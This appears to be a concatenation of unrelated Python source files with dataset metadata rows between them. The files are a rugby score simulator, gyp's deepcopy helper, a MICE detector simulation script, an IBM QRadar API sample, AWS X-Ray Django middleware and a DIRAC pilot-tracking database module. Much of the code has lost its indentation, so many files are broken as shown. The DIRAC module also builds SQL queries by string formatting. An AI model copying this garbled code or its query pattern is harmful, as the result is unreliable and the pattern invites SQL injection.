# bpd1 = 0
# if bp2:
# bpd2 = 1
# else:
# bpd2 = 0
# summary = {team_1: [win_1, draw_1, score_1, bpw1, bpd1, bpl1, lbp1]}
# summary.update({team_2: [win_2, draw_2, score_2, bpw2, bpd2, bpl2, lbp2]})
# return summary
def get_expected_scores(team_1_stats, team_2_stats, team_1_df, team_2_df): #Get the expected scores for a matchup based on the previous teams' performances
expected_scores = {}
#print('\n')
#print('Residual Stats')
#print(team_1_stats)
#print(team_2_stats)
#print('\n')
    # The expected totals do not depend on any loop variable, so compute them once.
    expected_scores.update({'T': mean([team_1_stats['TF'] + np.average(team_2_df['TA'], weights = team_2_df['Weight']),
                                       team_2_stats['TA'] + np.average(team_1_df['TF'], weights = team_1_df['Weight'])])})
    expected_scores.update({'P': mean([team_1_stats['PF'] + np.average(team_2_df['PA'], weights = team_2_df['Weight']),
                                       team_2_stats['PA'] + np.average(team_1_df['PF'], weights = team_1_df['Weight'])])})
    expected_scores.update({'DG': mean([team_1_stats['DGF'] + np.average(team_2_df['DGA'], weights = team_2_df['Weight']),
                                        team_2_stats['DGA'] + np.average(team_1_df['DGF'], weights = team_1_df['Weight'])])})
#expected_scores['T'] = max(expected_scores['T'], 0)
#expected_scores['P'] = max(expected_scores['P'], 0)
expected_scores['DG'] = max(expected_scores['DG'], 0)
#print mean([team_1_stats['PAT1%F'] + team_2_df['PAT1AS'].astype('float').sum() / team_2_df['PAT1AA'].sum(),
# team_2_stats['PAT1%A'] + team_1_df['PAT1FS'].astype('float').sum() / team_1_df['PAT1FA'].sum()])
try:
conprob = mean([team_1_stats['CON%F'] + (team_2_df['CA']*team_2_df['Weight']).sum() / (team_2_df['TA']*team_2_df['Weight']).sum(),
team_2_stats['CON%A'] + (team_1_df['CF']*team_1_df['Weight']).sum() / (team_1_df['TF']*team_1_df['Weight']).sum()])
except ZeroDivisionError:
conprob = 0.75
if not math.isnan(conprob):
conprob = min(max(conprob, 0.01), 0.99)
expected_scores.update({'CONPROB': conprob})
else:
expected_scores.update({'CONPROB': 0.75})
#print(expected_scores['PAT1PROB'])
#print(expected_scores)
return expected_scores
def geodesic_distance(olat, olng, dlat, dlng):
'''
    Returns the geodesic distance as a fraction of half the earth's circumference between two points on the earth's surface
'''
scale = math.tau/360
olat *= scale
olng *= scale
dlat *= scale
dlng *= scale
delta_lat = (dlat - olat)
delta_lng = (dlng - olng)
a = math.sin(delta_lat/2)**2 + math.cos(olat)*math.cos(dlat)*math.sin(delta_lng/2)**2
return 4*math.atan2(math.sqrt(a), math.sqrt(1-a))/math.tau
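# Quick sanity check (coordinates are assumed, not real venues):
#   geodesic_distance(0, 0, 0, 90)  -> 0.5  (a quarter of the globe)
#   geodesic_distance(0, 0, 0, 180) -> 1.0  (antipodal points)
# so the returned fraction always lies in [0, 1].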
def get_travel_weight(venue, home_lat, home_lng, reference_distance):
'''
Gets the travel weight based on a venue, a team's home lat/long coordinates, and a reference distance
'''
global stadium_locs
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
travel_distance = geodesic_distance(home_lat, home_lng, venue_lat, venue_lng)
return 1 - abs(travel_distance - reference_distance)
def get_score(expected_scores, score_array, n_sim, return_tries = True):
tf = sim_util.sim(expected_scores['T'][0], expected_scores['T'][1], n_sim)
cf = np.random.binomial(tf, expected_scores['C'])
pf = sim_util.sim(expected_scores['P'][0], expected_scores['P'][1], n_sim)
dgf = sim_util.sim(expected_scores['DG'][0], expected_scores['DG'][1], n_sim)
score = sim_util.calculate_score((tf, cf, pf, dgf), score_array)
if return_tries:
return score, tf
else:
return score
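# Note on the scoring model above (a sketch that relies on sim_util's
# (mean, variance) simulator exactly as called): score_array carries the point
# values [try, conversion, penalty, drop goal] -- [5, 2, 3, 3] under current
# rugby union scoring -- and conversions are drawn as binomial successes on the
# simulated try counts, e.g. (hypothetical inputs):
#   scores, tries = get_score({'T': (3, 1), 'C': 0.7, 'P': (2, 1), 'DG': (0.1, 0.1)},
#                             [5, 2, 3, 3], n_sim=1000)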
def matchup(team_1, team_2, venue = None):
ts = time.time()
global team_homes, stadium_locs
team_1_home = team_homes[1][team_1]
team_2_home = team_homes[1][team_2]
if venue is None:
venue = team_homes[1][team_1]
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
(team_1_home_lat, team_1_home_lng) = stadium_locs.loc[team_1_home, ['Lat', 'Long']]
(team_2_home_lat, team_2_home_lng) = stadium_locs.loc[team_2_home, ['Lat', 'Long']]
team_1_reference_distance = geodesic_distance(team_1_home_lat, team_1_home_lng, venue_lat, venue_lng)
team_2_reference_distance = geodesic_distance(team_2_home_lat, team_2_home_lng, venue_lat, venue_lng)
def get_team_1_weight(location):
return get_travel_weight(location, team_1_home_lat, team_1_home_lng, team_1_reference_distance)
def get_team_2_weight(location):
return get_travel_weight(location, team_2_home_lat, team_2_home_lng, team_2_reference_distance)
    team_1_season = pd.read_csv(os.path.join(teamsheetpath, team_1 + '.csv'), index_col=0)
    team_2_season = pd.read_csv(os.path.join(teamsheetpath, team_2 + '.csv'), index_col=0)
team_1_season['Weight'] = team_1_season['VENUE'].apply(get_team_1_weight)
team_2_season['Weight'] = team_2_season['VENUE'].apply(get_team_2_weight)
stats_1, variances_1 = get_residual_performance(team_1_season)
stats_2, variances_2 = get_residual_performance(team_2_season)
expected_scores_1 = get_expected_scores(stats_1, stats_2, team_1_season, team_2_season)
expected_scores_2 = get_expected_scores(stats_2, stats_1, team_2_season, team_1_season)
    var_1 = pd.Series(0.25*(variances_1.loc[['TF', 'PF', 'DGF']].values + variances_2.loc[['TA', 'PA', 'DGA']].values), ['T', 'P', 'DG'])
    var_2 = pd.Series(0.25*(variances_2.loc[['TF', 'PF', 'DGF']].values + variances_1.loc[['TA', 'PA', 'DGA']].values), ['T', 'P', 'DG'])
for stat in var_1.index:
if math.isnan(var_1[stat]):
var_1[stat] = expected_scores_1[stat]
if math.isnan(var_2[stat]):
var_2[stat] = expected_scores_2[stat]
score_array = [5, 2, 3, 3]
n_sim = int(5e6)
expected_scores_1a = {'T': (expected_scores_1['T'], var_1['T']),
'C': expected_scores_1['CONPROB'],
'P': (expected_scores_1['P'], var_1['P']),
'DG': (expected_scores_1['DG'], var_1['DG'])}
expected_scores_2a = {'T': (expected_scores_2['T'], var_2['T']),
'C': expected_scores_2['CONPROB'],
'P': (expected_scores_2['P'], var_2['P']),
'DG': (expected_scores_2['DG'], var_2['DG'])}
print(expected_scores_1a)
print(expected_scores_2a)
ts = time.time()
(team_1_scores, team_1_tries) = get_score(expected_scores_1a, score_array, n_sim)
(team_2_scores, team_2_tries) = get_score(expected_scores_2a, score_array, n_sim)
te = time.time()
print(te - ts)
(team_1_wins, team_2_wins, draws) = sim_util.eval_results(team_1_scores, team_2_scores, po)
(team_1_tb, team_2_tb) = sim_util.eval_try_bonus(team_1_tries, team_2_tries, 3)
(team_1_lb, team_2_lb) = sim_util.eval_losing_bonus(team_1_scores, team_2_scores, 7)
team_1_prob = team_1_wins.mean()
team_2_prob = team_2_wins.mean()
draw_prob = draws.mean()
team_1_bpw_prob = (team_1_tb * team_1_wins).mean()
team_1_bpd_prob = (team_1_tb * draws).mean()
team_1_bpl_prob = (team_1_tb * team_2_wins).mean()
team_1_lbp_prob = (team_1_lb).mean()
team_2_bpw_prob = (team_2_tb * team_2_wins).mean()
team_2_bpd_prob = (team_2_tb * draws).mean()
team_2_bpl_prob = (team_2_tb * team_1_wins).mean()
team_2_lbp_prob = (team_2_lb).mean()
    games = pd.DataFrame({team_1: team_1_scores, team_2: team_2_scores})
pre_summaries = games.describe(percentiles = list(np.linspace(0.05, 0.95, 19)))
summaries = pd.DataFrame(columns = pre_summaries.columns)
summaries.loc['mean'] = pre_summaries.loc['mean']
for i in pre_summaries.index:
try:
percentile = int(round(float(i[:-1])))
summaries.loc['{}%'.format(percentile)] = pre_summaries.loc[i]
except ValueError:
continue
summaries = summaries.reset_index()
for item in summaries.index:
try:
            summaries.loc[item, 'index'] = str(int(float(summaries['index'][item][:-1]))) + '%'
except ValueError:
continue
bonus_points = pd.DataFrame(index = ['4-Try Bonus Point with Win',
'4-Try Bonus Point with Draw',
'4-Try Bonus Point with Loss',
'Losing Bonus Point'])
bonus_points[team_1] = [team_1_bpw_prob, team_1_bpd_prob, team_1_bpl_prob, team_1_lbp_prob]
bonus_points[team_2] = [team_2_bpw_prob, team_2_bpd_prob, team_2_bpl_prob, team_2_lbp_prob]
summaries = summaries.set_index('index')
summaries = summaries.groupby(level = 0).last()
output = {'ProbWin': {team_1: team_1_prob, team_2: team_2_prob}, 'Scores': summaries, 'Bonus Points': bonus_points}
print(team_1 + '/' + team_2 + ' score distributions computed in ' + str(round(time.time() - ts, 1)) + ' seconds')
return output | mit | 3,946,143,101,696,154,000 | 39.29927 | 162 | 0.55899 | false |
pyokagan/gyp | pylib/gyp/simple_copy.py | 1 | 1385 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
import sys
_PYTHON3 = sys.version_info >= (3, 0, 0)
if _PYTHON3:
long = int
unicode = str
class Error(Exception):
pass
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
"""Deep copy operation on gyp objects such as strings, ints, dicts
and lists. More than twice as fast as copy.deepcopy but much less
generic."""
try:
return _deepcopy_dispatch[type(x)](x)
except KeyError:
    raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy '
                'or expand simple_copy support.' % type(x))
_deepcopy_dispatch = d = {}
def _deepcopy_atomic(x):
return x
for x in (type(None), int, long, float,
bool, str, unicode, type):
d[x] = _deepcopy_atomic
def _deepcopy_list(x):
return [deepcopy(a) for a in x]
d[list] = _deepcopy_list
def _deepcopy_dict(x):
y = {}
for key, value in x.items():
y[deepcopy(key)] = deepcopy(value)
return y
d[dict] = _deepcopy_dict
del d
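# A small self-check with illustrative values, runnable as a script:
if __name__ == '__main__':
  original = {'defines': ['FOO'], 'deps': [1, 2, 3]}
  cloned = deepcopy(original)
  assert cloned == original and cloned is not original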
# vim: expandtab tabstop=2 shiftwidth=2:
| bsd-3-clause | 4,918,599,992,610,725,000 | 22.474576 | 72 | 0.680866 | false |
mice-software/maus | bin/user/simulate_mice.py | 1 | 2151 | #!/usr/bin/env python
"""
Simulate the MICE experiment
This will simulate MICE spills through the entirety of MICE using Geant4, then
digitize and reconstruct TOF and tracker hits to space points.
"""
import io # generic python library for I/O
import MAUS # MAUS libraries
def run():
""" Run the macro
"""
# This input generates empty spills, to be filled by the beam maker later on
my_input = MAUS.InputPySpillGenerator()
# Create an empty array of mappers, then populate it
# with the functionality you want to use.
my_map = MAUS.MapPyGroup()
# GEANT4
my_map.append(MAUS.MapPyBeamMaker()) # beam construction
my_map.append(MAUS.MapCppSimulation()) # geant4 simulation
# Pre detector set up
# my_map.append(MAUS.MapPyMCReconSetup()) # geant4 simulation
my_map.append(MAUS.MapCppMCReconSetup()) # geant4 simulation
# TOF
my_map.append(MAUS.MapCppTOFMCDigitizer()) # TOF MC Digitizer
my_map.append(MAUS.MapCppTOFSlabHits()) # TOF MC Slab Hits
my_map.append(MAUS.MapCppTOFSpacePoints()) # TOF Space Points
# KL
my_map.append(MAUS.MapCppKLMCDigitizer()) # KL MC Digitizer
my_map.append(MAUS.MapCppKLCellHits()) # KL CellHit Reco
# SciFi
my_map.append(MAUS.MapCppTrackerMCDigitization()) # SciFi electronics model
my_map.append(MAUS.MapCppTrackerRecon()) # SciFi Recon
# EMR
my_map.append(MAUS.MapCppEMRMCDigitization()) # EMR MC Digitizer
my_map.append(MAUS.MapCppEMRSpacePoints()) # EMR Space Points
my_map.append(MAUS.MapCppEMRRecon()) # EMR Recon
# Ckov
my_map.append(MAUS.MapCppCkovMCDigitizer())
# Global Digits - post detector digitisation
# Then construct a MAUS output component - filename comes from datacards
my_output = MAUS.OutputCppRoot()
# can specify datacards here or by using appropriate command line calls
datacards = io.StringIO(u"")
# The Go() drives all the components you pass in, then check the file
# (default simulation.out) for output
MAUS.Go(my_input, my_map, MAUS.ReducePyDoNothing(), my_output, datacards)
if __name__ == '__main__':
run()
| gpl-3.0 | -5,412,434,296,677,713,000 | 30.632353 | 80 | 0.699675 | false |
ibm-security-intelligence/api-samples | data_classification/02_LowLevelCategories.py | 1 | 2598 | #!/usr/bin/env python3
# This sample script demonstrates how to
# 1. get a list of low level categories
# 2. get a single low level category by its id
import importlib
import json
import os
import sys
sys.path.append(os.path.realpath('../modules'))
client_module = importlib.import_module('RestApiClient')
SampleUtilities = importlib.import_module('SampleUtilities')
def main():
# create the api client
client = client_module.RestApiClient(version='7.0')
# -------------------------------------------------------------------------
# 1. get a list of low level categories
endpoint_url = 'data_classification/low_level_categories'
http_method = 'GET'
# 'fields' is used to limit the fields returned for each record
fields = 'id, name'
# 'query_filter' is used to filter the list returned based on field values
# low_level_category_id can be used in the filter to get a list of low
# level categories belonging to the specified high level category
query_filter = 'high_level_category_id = 4000'
# 'sort' is used to sort list based on applicable fields
sort = '+id'
# populate the optional parameters to be used in request
params = {'fields': fields, 'filter': query_filter, 'sort': sort}
# send the request
response = client.call_api(endpoint_url, http_method, params=params,
print_request=True)
# check response and handle any error
if response.code == 200:
# extract records from response
low_level_categories = json.loads(response.read().decode('utf-8'))
print(low_level_categories)
else:
print('Failed to get the list of low level categories')
SampleUtilities.pretty_print_response(response)
sys.exit(1)
# -------------------------------------------------------------------------
# 2. get a single low level category by its id
low_level_category_id = 3001
endpoint_url = ('data_classification/low_level_categories' + '/' +
str(low_level_category_id))
# send the request
response = client.call_api(endpoint_url, http_method, print_request=True)
# check response and handle any error
if response.code == 200:
# extract record from response
low_level_category = json.loads(response.read().decode('utf-8'))
print(low_level_category)
else:
print('Failed to get the low level category with id=' +
str(low_level_category_id))
SampleUtilities.pretty_print_response(response)
if __name__ == "__main__":
main()
| apache-2.0 | 4,357,113,796,614,164,000 | 32.74026 | 79 | 0.624326 | false |
lukaasp/libs | aws_xray_sdk/ext/django/middleware.py | 1 | 3458 | import logging
import traceback
from aws_xray_sdk.core import xray_recorder
from aws_xray_sdk.core.models import http
from aws_xray_sdk.core.models.trace_header import TraceHeader
log = logging.getLogger(__name__)
# Django will rewrite some http request headers.
USER_AGENT_KEY = 'HTTP_USER_AGENT'
X_FORWARDED_KEY = 'HTTP_X_FORWARDED_FOR'
REMOTE_ADDR_KEY = 'REMOTE_ADDR'
XRAY_HEADER_KEY = 'HTTP_X_AMZN_TRACE_ID'
HOST_KEY = 'HTTP_HOST'
CONTENT_LENGTH_KEY = 'content-length'
class XRayMiddleware(object):
"""
    Middleware that wraps each incoming request in a segment.
"""
def __init__(self, get_response):
self.get_response = get_response
# hooks for django version >= 1.10
def __call__(self, request):
# a segment name is required
name = xray_recorder.service
xray_header = self._get_tracing_header(request)
if not xray_header:
xray_header = TraceHeader()
sampling_decision = None
meta = request.META
# sampling decision from incoming request's header has highest precedence
if xray_header.sampled is not None:
sampling_decision = xray_header.sampled
elif not xray_recorder.sampling:
sampling_decision = 1
elif xray_recorder.sampler.should_trace(
service_name=meta.get(HOST_KEY),
method=request.method,
path=request.path,
):
sampling_decision = 1
else:
sampling_decision = 0
segment = xray_recorder.begin_segment(
name=name,
traceid=xray_header.root,
parent_id=xray_header.parent,
sampling=sampling_decision,
)
segment.put_http_meta(http.URL, request.build_absolute_uri())
segment.put_http_meta(http.METHOD, request.method)
if meta.get(USER_AGENT_KEY):
segment.put_http_meta(http.USER_AGENT, meta.get(USER_AGENT_KEY))
if meta.get(X_FORWARDED_KEY):
# X_FORWARDED_FOR may come from untrusted source so we
# need to set the flag to true as additional information
segment.put_http_meta(http.CLIENT_IP, meta.get(X_FORWARDED_KEY))
segment.put_http_meta(http.X_FORWARDED_FOR, True)
elif meta.get(REMOTE_ADDR_KEY):
segment.put_http_meta(http.CLIENT_IP, meta.get(REMOTE_ADDR_KEY))
response = self.get_response(request)
status_code = int(response.status_code)
segment.apply_status_code(status_code)
segment.put_http_meta(http.STATUS, status_code)
if response.has_header(CONTENT_LENGTH_KEY):
length = int(response[CONTENT_LENGTH_KEY])
segment.put_http_meta(http.CONTENT_LENGTH, length)
xray_recorder.end_segment()
return response
def process_exception(self, request, exception):
"""
Add exception information and fault flag to the
current segment.
"""
segment = xray_recorder.current_segment()
segment.add_fault_flag()
stack = traceback.extract_stack(limit=xray_recorder._max_trace_back)
segment.add_exception(exception, stack)
def _get_tracing_header(self, request):
header = request.META.get(http.XRAY_HEADER)
if not header:
header = request.META.get(XRAY_HEADER_KEY)
if not header:
return None
return TraceHeader.from_header_str(header)
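# Minimal illustration of the header handling above (the trace id is a made-up
# example in AWS's documented format): an incoming 'X-Amzn-Trace-Id' value such as
#   'Root=1-5759e988-bd862e3fe1be46a994272793;Sampled=1'
# is parsed by TraceHeader.from_header_str(), and its root/parent/sampled fields
# seed the segment begun in __call__().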
| unlicense | -9,111,171,738,209,037,000 | 31.622642 | 81 | 0.633892 | false |
yujikato/DIRAC | src/DIRAC/WorkloadManagementSystem/DB/PilotAgentsDB.py | 1 | 43047 | """ PilotAgentsDB class is a front-end to the Pilot Agent Database.
This database keeps track of all the submitted grid pilot jobs.
It also registers the mapping of the DIRAC jobs to the pilot
agents.
Available methods are:
addPilotTQReference()
setPilotStatus()
deletePilot()
clearPilots()
setPilotDestinationSite()
storePilotOutput()
getPilotOutput()
setJobForPilot()
getPilotsSummary()
getGroupedPilotSummary()
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import six
import threading
import decimal
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base.DB import DB
import DIRAC.Core.Utilities.Time as Time
from DIRAC.Core.Utilities import DErrno
from DIRAC.ConfigurationSystem.Client.Helpers.Resources import getCESiteMapping
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getUsernameForDN, getDNForUsername, getVOForGroup
from DIRAC.ResourceStatusSystem.Client.SiteStatus import SiteStatus
from DIRAC.Core.Utilities.MySQL import _quotedList
class PilotAgentsDB(DB):
def __init__(self):
super(PilotAgentsDB, self).__init__('PilotAgentsDB', 'WorkloadManagement/PilotAgentsDB')
self.lock = threading.Lock()
##########################################################################################
  def addPilotTQReference(self, pilotRef, taskQueueID, ownerDN, ownerGroup, broker='Unknown',
                          gridType='DIRAC', pilotStampDict=None):
    """ Add a new pilot job reference """
    if pilotStampDict is None:
      pilotStampDict = {}
err = 'PilotAgentsDB.addPilotTQReference: Failed to retrieve a new Id.'
for ref in pilotRef:
stamp = ''
if ref in pilotStampDict:
stamp = pilotStampDict[ref]
res = self._escapeString(ownerDN)
if not res['OK']:
return res
escapedOwnerDN = res['Value']
req = "INSERT INTO PilotAgents( PilotJobReference, TaskQueueID, OwnerDN, " + \
"OwnerGroup, Broker, GridType, SubmissionTime, LastUpdateTime, Status, PilotStamp ) " + \
"VALUES ('%s',%d,%s,'%s','%s','%s',UTC_TIMESTAMP(),UTC_TIMESTAMP(),'Submitted','%s')" % \
(ref, int(taskQueueID), escapedOwnerDN, ownerGroup, broker, gridType, stamp)
result = self._update(req)
if not result['OK']:
return result
if 'lastRowId' not in result:
return S_ERROR('%s' % err)
return S_OK()
##########################################################################################
def setPilotStatus(self, pilotRef, status, destination=None,
statusReason=None, gridSite=None, queue=None,
benchmark=None, currentJob=None,
updateTime=None, conn=False):
""" Set pilot job status
"""
setList = []
setList.append("Status='%s'" % status)
if updateTime:
setList.append("LastUpdateTime='%s'" % updateTime)
else:
setList.append("LastUpdateTime=UTC_TIMESTAMP()")
if not statusReason:
statusReason = "Not given"
setList.append("StatusReason='%s'" % statusReason)
if gridSite:
setList.append("GridSite='%s'" % gridSite)
if queue:
setList.append("Queue='%s'" % queue)
if benchmark:
setList.append("BenchMark='%s'" % float(benchmark))
if currentJob:
setList.append("CurrentJobID='%s'" % int(currentJob))
if destination:
setList.append("DestinationSite='%s'" % destination)
if not gridSite:
res = getCESiteMapping(destination)
if res['OK'] and res['Value']:
setList.append("GridSite='%s'" % res['Value'][destination])
set_string = ','.join(setList)
req = "UPDATE PilotAgents SET " + set_string + " WHERE PilotJobReference='%s'" % pilotRef
result = self._update(req, conn=conn)
if not result['OK']:
return result
return S_OK()
# ###########################################################################################
# FIXME: this can't work ATM because of how the DB table is made. Maybe it would be useful later.
# def setPilotStatusBulk(self, pilotRefsStatusDict=None, statusReason=None,
# conn=False):
# """ Set pilot job status in a bulk
# """
# if not pilotRefsStatusDict:
# return S_OK()
# # Building the request with "ON DUPLICATE KEY UPDATE"
# reqBase = "INSERT INTO PilotAgents (PilotJobReference, Status, StatusReason) VALUES "
# for pilotJobReference, status in pilotRefsStatusDict.items():
# req = reqBase + ','.join("('%s', '%s', '%s')" % (pilotJobReference, status, statusReason))
# req += " ON DUPLICATE KEY UPDATE Status=VALUES(Status),StatusReason=VALUES(StatusReason)"
# return self._update(req, conn)
##########################################################################################
def selectPilots(self, condDict, older=None, newer=None, timeStamp='SubmissionTime',
orderAttribute=None, limit=None):
""" Select pilot references according to the provided criteria. "newer" and "older"
specify the time interval in minutes
"""
condition = self.buildCondition(condDict, older, newer, timeStamp)
if orderAttribute:
orderType = None
orderField = orderAttribute
if orderAttribute.find(':') != -1:
orderType = orderAttribute.split(':')[1].upper()
orderField = orderAttribute.split(':')[0]
condition = condition + ' ORDER BY ' + orderField
if orderType:
condition = condition + ' ' + orderType
if limit:
condition = condition + ' LIMIT ' + str(limit)
req = "SELECT PilotJobReference from PilotAgents"
if condition:
req += " %s " % condition
result = self._query(req)
if not result['OK']:
return result
pilotList = []
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
##########################################################################################
def countPilots(self, condDict, older=None, newer=None, timeStamp='SubmissionTime'):
""" Select pilot references according to the provided criteria. "newer" and "older"
specify the time interval in minutes
"""
condition = self.buildCondition(condDict, older, newer, timeStamp)
req = "SELECT COUNT(PilotID) from PilotAgents"
if condition:
req += " %s " % condition
result = self._query(req)
if not result['OK']:
return result
return S_OK(result['Value'][0][0])
#########################################################################################
  def getPilotGroups(self, groupList=None, condDict=None):
    """
    Get all existing combinations of groupList Values
    """
    if groupList is None:
      groupList = ['Status', 'OwnerDN', 'OwnerGroup', 'GridType']
    if condDict is None:
      condDict = {}
    cmd = 'SELECT %s from PilotAgents ' % ', '.join(groupList)
condList = []
for cond in condDict:
condList.append('%s in ( "%s" )' % (cond, '", "'.join([str(y) for y in condDict[cond]])))
# the conditions should be escaped before hand, so it is not really nice to expose it this way...
if condList:
cmd += ' WHERE %s ' % ' AND '.join(condList)
cmd += ' GROUP BY %s' % ', '.join(groupList)
return self._query(cmd)
##########################################################################################
def deletePilots(self, pilotIDs, conn=False):
""" Delete Pilots with IDs in the given list from the PilotAgentsDB """
if not isinstance(pilotIDs, list):
return S_ERROR('Input argument is not a List')
failed = []
for table in ['PilotOutput', 'JobToPilotMapping', 'PilotAgents']:
idString = ','.join([str(pid) for pid in pilotIDs])
req = "DELETE FROM %s WHERE PilotID in ( %s )" % (table, idString)
result = self._update(req, conn=conn)
if not result['OK']:
failed.append(table)
if failed:
return S_ERROR('Failed to remove pilot from %s tables' % ', '.join(failed))
return S_OK(pilotIDs)
##########################################################################################
def deletePilot(self, pilotRef, conn=False):
""" Delete Pilot with the given reference from the PilotAgentsDB """
if isinstance(pilotRef, six.string_types):
pilotID = self.__getPilotID(pilotRef)
else:
pilotID = pilotRef
return self.deletePilots([pilotID], conn=conn)
##########################################################################################
def clearPilots(self, interval=30, aborted_interval=7):
""" Delete all the pilot references submitted before <interval> days """
reqList = []
reqList.append(
"SELECT PilotID FROM PilotAgents WHERE SubmissionTime < DATE_SUB(UTC_TIMESTAMP(),INTERVAL %d DAY)" %
interval)
reqList.append(
"SELECT PilotID FROM PilotAgents WHERE Status='Aborted' \
AND SubmissionTime < DATE_SUB(UTC_TIMESTAMP(),INTERVAL %d DAY)" %
aborted_interval)
idList = None
for req in reqList:
result = self._query(req)
if not result['OK']:
self.log.warn('Error while clearing up pilots')
else:
if result['Value']:
idList = [x[0] for x in result['Value']]
result = self.deletePilots(idList)
if not result['OK']:
self.log.warn('Error while deleting pilots')
return S_OK(idList)
##########################################################################################
  def getPilotInfo(self, pilotRef=False, parentId=False, conn=False, paramNames=None, pilotID=False):
""" Get all the information for the pilot job reference or reference list
"""
parameters = ['PilotJobReference', 'OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'BenchMark', 'ParentID', 'OutputReady', 'AccountingSent',
'SubmissionTime', 'PilotID', 'LastUpdateTime', 'TaskQueueID', 'GridSite', 'PilotStamp',
'Queue']
if paramNames:
parameters = paramNames
cmd = "SELECT %s FROM PilotAgents" % ", ".join(parameters)
condSQL = []
if pilotRef:
if isinstance(pilotRef, list):
condSQL.append("PilotJobReference IN (%s)" % ",".join(['"%s"' % x for x in pilotRef]))
else:
condSQL.append("PilotJobReference = '%s'" % pilotRef)
if pilotID:
if isinstance(pilotID, list):
condSQL.append("PilotID IN (%s)" % ",".join(['%s' % x for x in pilotID]))
else:
condSQL.append("PilotID = '%s'" % pilotID)
if parentId:
if isinstance(parentId, list):
condSQL.append("ParentID IN (%s)" % ",".join(['%s' % x for x in parentId]))
else:
condSQL.append("ParentID = %s" % parentId)
if condSQL:
cmd = "%s WHERE %s" % (cmd, " AND ".join(condSQL))
result = self._query(cmd, conn=conn)
if not result['OK']:
return result
if not result['Value']:
msg = "No pilots found"
if pilotRef:
msg += " for PilotJobReference(s): %s" % pilotRef
if parentId:
msg += " with parent id: %s" % parentId
return S_ERROR(DErrno.EWMSNOPILOT, msg)
resDict = {}
pilotIDs = []
for row in result['Value']:
pilotDict = {}
for i in range(len(parameters)):
pilotDict[parameters[i]] = row[i]
if parameters[i] == 'PilotID':
pilotIDs.append(row[i])
resDict[row[0]] = pilotDict
result = self.getJobsForPilot(pilotIDs)
if not result['OK']:
return S_OK(resDict)
jobsDict = result['Value']
for pilotRef in resDict:
pilotInfo = resDict[pilotRef]
pilotID = pilotInfo['PilotID']
if pilotID in jobsDict:
pilotInfo['Jobs'] = jobsDict[pilotID]
return S_OK(resDict)
##########################################################################################
def setPilotDestinationSite(self, pilotRef, destination, conn=False):
""" Set the pilot agent destination site
"""
gridSite = 'Unknown'
res = getCESiteMapping(destination)
if res['OK'] and res['Value']:
gridSite = res['Value'][destination]
req = "UPDATE PilotAgents SET DestinationSite='%s', GridSite='%s' WHERE PilotJobReference='%s'"
req = req % (destination, gridSite, pilotRef)
return self._update(req, conn=conn)
##########################################################################################
def setPilotBenchmark(self, pilotRef, mark):
""" Set the pilot agent benchmark
"""
req = "UPDATE PilotAgents SET BenchMark='%f' WHERE PilotJobReference='%s'" % (mark, pilotRef)
result = self._update(req)
return result
##########################################################################################
def setAccountingFlag(self, pilotRef, mark='True'):
""" Set the pilot AccountingSent flag
"""
req = "UPDATE PilotAgents SET AccountingSent='%s' WHERE PilotJobReference='%s'" % (mark, pilotRef)
result = self._update(req)
return result
##########################################################################################
def storePilotOutput(self, pilotRef, output, error):
""" Store standard output and error for a pilot with pilotRef
"""
pilotID = self.__getPilotID(pilotRef)
if not pilotID:
return S_ERROR('Pilot reference not found %s' % pilotRef)
result = self._escapeString(output)
if not result['OK']:
return S_ERROR('Failed to escape output string')
e_output = result['Value']
result = self._escapeString(error)
if not result['OK']:
return S_ERROR('Failed to escape error string')
e_error = result['Value']
req = "INSERT INTO PilotOutput (PilotID,StdOutput,StdError) VALUES (%d,%s,%s)" % (pilotID, e_output, e_error)
result = self._update(req)
if not result['OK']:
return result
req = "UPDATE PilotAgents SET OutputReady='True' where PilotID=%d" % pilotID
return self._update(req)
##########################################################################################
def getPilotOutput(self, pilotRef):
""" Retrieve standard output and error for pilot with pilotRef
"""
req = "SELECT StdOutput, StdError FROM PilotOutput,PilotAgents WHERE "
req += "PilotOutput.PilotID = PilotAgents.PilotID AND PilotAgents.PilotJobReference='%s'" % pilotRef
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
stdout = result['Value'][0][0]
error = result['Value'][0][1]
if stdout == '""':
stdout = ''
if error == '""':
error = ''
return S_OK({'StdOut': stdout, 'StdErr': error})
else:
return S_ERROR('PilotJobReference ' + pilotRef + ' not found')
##########################################################################################
def __getPilotID(self, pilotRef):
""" Get Pilot ID for the given pilot reference or a list of references
"""
if isinstance(pilotRef, six.string_types):
req = "SELECT PilotID from PilotAgents WHERE PilotJobReference='%s'" % pilotRef
result = self._query(req)
if not result['OK']:
return 0
else:
if result['Value']:
return int(result['Value'][0][0])
return 0
else:
refString = ','.join(["'" + ref + "'" for ref in pilotRef])
req = "SELECT PilotID from PilotAgents WHERE PilotJobReference in ( %s )" % refString
result = self._query(req)
if not result['OK']:
return []
if result['Value']:
return [x[0] for x in result['Value']]
return []
##########################################################################################
def setJobForPilot(self, jobID, pilotRef, site=None, updateStatus=True):
""" Store the jobID of the job executed by the pilot with reference pilotRef
"""
pilotID = self.__getPilotID(pilotRef)
if pilotID:
if updateStatus:
reason = 'Report from job %d' % int(jobID)
result = self.setPilotStatus(pilotRef, status='Running', statusReason=reason,
gridSite=site)
if not result['OK']:
return result
req = "INSERT INTO JobToPilotMapping (PilotID,JobID,StartTime) VALUES (%d,%d,UTC_TIMESTAMP())" % (pilotID, jobID)
return self._update(req)
else:
return S_ERROR('PilotJobReference ' + pilotRef + ' not found')
##########################################################################################
def setCurrentJobID(self, pilotRef, jobID):
""" Set the pilot agent current DIRAC job ID
"""
